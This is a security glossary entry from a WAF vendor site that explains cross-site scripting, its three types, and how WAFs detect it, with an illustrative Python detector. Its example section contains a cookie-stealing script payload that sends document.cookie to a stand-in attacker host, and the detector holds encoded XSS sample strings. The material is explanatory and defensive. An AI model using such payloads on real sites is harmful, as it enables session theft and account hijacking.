WAFPlanet

Cross-Site Scripting (XSS)


Quick Definition

A vulnerability that allows attackers to inject malicious client-side scripts into web pages viewed by other users.

What is Cross-Site Scripting?

Cross-Site Scripting (XSS) is a client-side code injection attack where an attacker can execute malicious scripts in a victim's browser. XSS occurs when a web application includes untrusted data in a web page without proper validation or escaping.

XSS attacks can be used to:

  • Steal session cookies and hijack user accounts
  • Redirect users to malicious websites
  • Deface web pages
  • Log keystrokes and capture sensitive data
  • Spread malware

There are three main types of XSS:

  • Stored XSS: Malicious script is permanently stored on the target server (in a database, comment field, etc.)
  • Reflected XSS: Malicious script is embedded in a URL and reflected off the web server in error messages or search results
  • DOM-based XSS: The vulnerability exists in client-side JavaScript rather than server-side code

Examples

A comment form displays user input without escaping, and an attacker submits the following as a comment:

<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>

When other users view the page with this comment, their session cookies are sent to the attacker's server.

Frequently Asked Questions

How do WAFs detect XSS attacks?

WAFs detect XSS by scanning HTTP requests for malicious JavaScript patterns, HTML tags, and event handlers. They look for script tags, javascript: URLs, event-handler attributes such as onload and onerror, and encoded variations of these patterns.
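The detection approach described above, as an added example that is not code from WAFPlanet or from any WAF product: it decodes a request parameter before matching, which is what lets the "encoded variations" be caught. The rule names, function names and sample values are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import unquote_plus

# One rule per pattern family the paragraph names (rule names are hypothetical).
RULES = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "javascript_url": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
}

def match_rules(text):
    """Return the sorted names of rules that match text exactly as given."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def normalize(value, max_rounds=3):
    """Undo URL and HTML-entity encoding until the value stops changing."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value

def inspect_value(value):
    """Match the rules against the decoded form of one request parameter."""
    return match_rules(normalize(value))

# Constructed sample parameter values, not captured traffic.
SAMPLES = {
    "plain": "<script>x</script>",
    "url_encoded": "%3Cscript%3Ex%3C%2Fscript%3E",
    "double_encoded": "%253Cimg%2520src%253Dx%2520onerror%253Dx%253E",
    "entity_encoded": "javascript%26%2358%3Bvoid(0)",
    "benign": "how+to+turn+on+caching",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:15} raw={match_rules(value)} decoded={inspect_value(value)}")
```

Matching the raw value flags only the plain sample; the three encoded samples are caught only after normalization. Pattern rules of this kind also produce false positives on ordinary text (a sentence containing "javascript:" would match), so they complement output escaping in the application rather than replace it.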